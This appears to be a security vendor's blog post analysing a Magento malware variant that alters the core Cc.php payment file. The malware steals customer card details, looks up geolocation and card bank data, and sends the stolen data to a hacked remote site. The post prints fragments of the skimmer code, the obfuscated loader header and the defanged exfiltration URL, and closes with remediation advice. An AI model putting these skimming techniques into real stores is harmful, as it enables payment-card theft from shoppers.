The Magento Shoplift vulnerability had been patched about a year ago. And all this time we have been cleaning various Magento infections that steal customer credit card details either via server level code or JavaScript injected into order pages.
Modifications of the app/code/core/Mage/Payment/Model/Method/Cc.php file are among the most popular. Here are some typical examples that we wrote about:
Recently we found one more modification of this malware. The code is almost identical. The main changes are the use of online services to retrieve geolocation data based on the victim IP address
$dip = json_decode(file_get_contents("http://ip-api.com/json/".$ip.""));$country = $dip->country;
and the bank data based on the credit card number
$bin = substr($binx, 0, 6);$getbank = json_decode(file_get_contents("http://www.binlist.net/json/".$bin.""));$ccbrand = $getbank->brand;$ccbank = $getbank->bank;$cctype = $getbank->card_type;
plus the new remote address where they send the stolen data to: hxxps://www.herdamultimedia[.]com/resulta.php, which seems to also be a hacked site.
The most interesting thing about this malware is that not only did it inject the malicious code into Cc.php but also encrypted the whole file content so that it looks like one long line of code:
<?php /* Mr-GanDrunX - Hiddenymouz - HiddenCode */ error_reporting(0); define('__LOCALFILE__',__FILE__); goto HIDDEN; function gandrunx(){ preg_replace("/.*/e",strrev("x3Bx29x29x29'=Q.....
This encryption is mainly used by Indonesian hackers.
Why did they encrypt the file? Probably to avoid detection when people search for the malware patterns that we reported before. However, it’s actually not a very bright idea. Many malware scanners will detect the suspicious encryption anyway. Plus it is very easy to find it if you compare files to the canonical Magento files.
If you see modified core Magento files don’t try to identify and remove the malicious code – just replace them with the original ones. And don’t forget to update/patch Magento, check if there are any malicious administrator users and scan your server for backdoors that hackers might left there. Or let Sucuri take care of your site